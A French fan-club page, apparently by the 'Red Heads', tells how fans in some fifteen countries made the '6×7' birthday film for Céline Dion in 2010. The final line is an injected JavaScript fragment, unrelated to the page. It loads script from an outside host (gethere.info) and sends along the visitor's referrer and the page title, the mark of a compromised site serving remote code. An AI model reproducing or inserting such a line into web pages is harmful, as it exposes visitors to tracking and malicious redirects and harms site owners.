Souhaiter une bonne fête à Céline c’est simple, il suffit de l’écrire… l’écrire oui ! Mais l’écrire comment ?! Voilà comment a débuté l’histoire de l’aventure 6×7… Un jour d’été, une discussion animée, quelques fans autour de la table et nous étions repartis !

Il aura fallu plus de 10 mois à toute l’équipe des Red Heads pour mener à bien ce projet. Cette fois-ci, les Red Heads ont trouvé des relais aux quatre coins de la Terre afin d’accomplir un nouveau défi à la hauteur de nos ambitions. En effet, des fans de pays lointains comme la Chine, le Vietnam, la Pologne ou encore le Mexique… sont devenus, le temps d’une séquence, des Red Heads afin de montrer à Céline que, partout dans le monde, son anniversaire serait célébré comme il se doit. Ce film a réuni plus de 130 fans dans près d’une quinzaine de pays et la moitié des participants sont des nouveaux venus.

Sans la participation de tous les fans, notamment lors des séquences réalisées au Grau du Roi ou à Paris (séquences qui nécessitaient la présence de nombreux fans afin que le rendu soit le plus exceptionnel possible), le film 6×7 n’aurait jamais eu la même dimension, la même ampleur.

Dévoilé le 30 mars 2010, jour des 42 ans de Céline, le film 6×7 n’a pas tardé à faire parler de lui. Sans les fans, le film n’aurait jamais eu l’impact médiatique qu’il a connu. De nombreux médias (presse écrite, émissions de télévision, articles sur différents sites web…) ont relayé l’information et diffusé des extraits du film (voir la section The Red Heads et les média). Ceci est une preuve de la qualité et de la dimension internationale que possède le film 6×7.

Un immense merci à tous les Red Heads qui se sont mobilisés pour faire de ce projet une vraie réussite. Nous sommes très fiers de découvrir que, jour après jour, notre équipe prend de l’ampleur et trouve son écho au-delà des frontières dans différents pays du monde.

Nous vous proposons de voir ou de revoir ce que des fans peuvent faire lorsqu’ils sont réunis sous une seule et même casquette…

Et cerise sur le gâteau, un signe inespéré, un message plus qu’émouvant de Céline en personne, adressé aux Red Heads… en effet, Monsieur et Madame Coullier, surpris par la qualité et l’originalité de notre vidéo, ont décidé de la transmettre personnellement à Céline qui, pour le plus grand bonheur de tous, nous a écrit ces quelques mots… Merci Céline.


s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;